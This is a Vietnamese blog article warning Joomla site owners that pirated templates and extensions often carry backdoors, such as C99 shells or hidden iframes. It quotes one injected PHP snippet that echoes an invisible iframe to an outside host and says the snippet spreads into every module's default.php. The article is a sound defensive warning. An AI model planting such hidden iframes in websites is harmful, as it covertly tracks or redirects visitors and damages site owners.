kế hoạch có con

Nguy cơ dính backdoor từ template và extension lậu

Nguy cơ dính backdoor từ template và extension lậuJoomla là mã nguồn mở miễn phí. Nhưng để có một website đẹp và chuyên nghiệp từ mã nguồn Joomla, thì cần phải có template và các extension chuyên nghiệp hỗ trợ. Những template và extension này thì lại phải trả tiền. Đây chính là lý do khiến rất nhiều bạn sử dụng các template và extension Null được chia sẻ trên mạng.

backdoor - Nguy cơ dính backdoor từ template và extension lậu

Các template chuyên nghiệp, đẹp được chia sẻ trên các diễn đàn hầu hết của Joomlart, Rockettheme, TemplatePlazza, Shape5 và Gavick. Để mua bản quyền các template này, các bạn thường phải trả 50USD/template đơn hay các mức từ vài trăm USD/năm cho quyền thành viên để được download thoải mái. Với các component, module, plugin hay mambot thuộc dạng commercial (thương mại) cũng vậy, giá cả phải trả cũng từ vài chục USD đến hàng trăm USD.

 

Đây chính là lý do để các bạn tặc lưỡi: Vào google, gõ 1 từ khóa, lôi về một đống template và extension chia sẻ FREE 100%.

 

Thực tế cho thấy, rất nhiều template và extension được chia sẻ này có chứa backdoor hoặc mã độc. Nặng thì là một vài con Shell C99, nhẹ là vài dòng link back hoặc Iframe trỏ về một trang nào đó có chủ đích.

 

Ví dụ, hiện có nhiều trang web cài extension Null đang bị dính mã Iframe này:

 

<?php endforeach;
echo “<iframe src=”http://hosttracker.net/?click=29341062″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;
?>

 

Khi bạn cho web chạy, backdoor sẽ nhảy vào tất cả các module, chèn đoạn mã trên vào tất cả các file default.php trong thư mục tmpl.

 

Với backdoor, nhẹ thì bạn chỉ bị mất chút thông tin, nặngweb bạn có thể bị đánh sập hoặc bị phá hoại rất lâu dài. Ít nhất, thì những iframe như trên cũng sẽ khiến google chú ý và sẽ triệt hạ kết quả tìm kiếm trên website của bạn.

 

Nói tóm lại, để đảm bản an toàn cho website, bạn không nên dùng các template và extension chia sẻ vô tội vạ trên mạng. Tất cả template, mã nguồn và extension đều phải được tải về từ chính nhà sản xuất ra chúng hoặc ít nhất là từ joomlacode.org.

 

Theo: Joomlaviet

Website tiêu biểu

Bài viết mới

Top 10 resort sang trọng bậc nhất Phú Quốc

resort sang trong bac nhat Phu Quoc 150x150 - Top 10 resort sang trọng bậc nhất Phú Quốc

Resort sang trọng bậc nhất ở Phú Quốc là những đâu? Bạn còn đang phân vân chọn resort để tận […]

Cách kiểm tra ứng dụng nào đang truy cập vị trí của bạn trên điện thoại Android và iPhone

cach kiem tra ung dung nao dang truy cap vi tri cua ban tren dien thoai android va iphone 150x150 - Cách kiểm tra ứng dụng nào đang truy cập vị trí của bạn trên điện thoại Android và iPhone

Các ứng dụng trên điện thoại có thể theo dõi vị trí của bạn. Bài viết sau, Điện máy XANH […]

Top 10 địa điểm mới nhất ở Cần Thơ 2021 nên ghé

dao-xuong-ba-la-ghe-tham-cu-lao

Điạ điểm mới nhất ở Cần Thơ nào hấp dẫn du khách? Bạn muốn khám phá du lịch miền Tây […]

Cầu Vàng Đà Nẵng: thông tin, giá vé, tham quan 2020

Cầu Vàng Đà Nẵng

Cầu Vàng Đà Nẵng được xem là biểu tượng du lịch và còn là niềm tự hào của người dân […]

Review truyện Mệnh phượng hoàng – hành trình trở thành người đứng đầu thiên hạ

2 150x150 - Review truyện Mệnh phượng hoàng - hành trình trở thành người đứng đầu thiên hạ

Từ Thứ nữ bị xem thường trở thành hoàng hậu và có được tình yêu chân thành từ bậc đế […]